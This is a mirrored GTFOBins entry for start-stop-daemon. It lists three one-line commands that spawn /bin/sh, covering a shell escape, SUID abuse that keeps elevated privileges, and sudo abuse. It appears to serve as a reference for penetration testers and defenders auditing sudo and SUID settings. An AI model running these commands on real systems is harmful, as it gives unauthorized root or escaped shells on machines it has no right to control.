mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 15:59:17 +01:00
12 lines
242 B
Markdown
12 lines
242 B
Markdown
|
---
|
||
|
functions:
|
||
|
shell:
|
||
|
- code: start-stop-daemon -n $RANDOM -S -x /bin/sh
|
||
|
suid:
|
||
|
- code: |
|
||
|
./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
|
||
|
sudo:
|
||
|
- code: |
|
||
|
sudo start-stop-daemon -n $RANDOM -S -x /bin/sh
|
||
|
---
|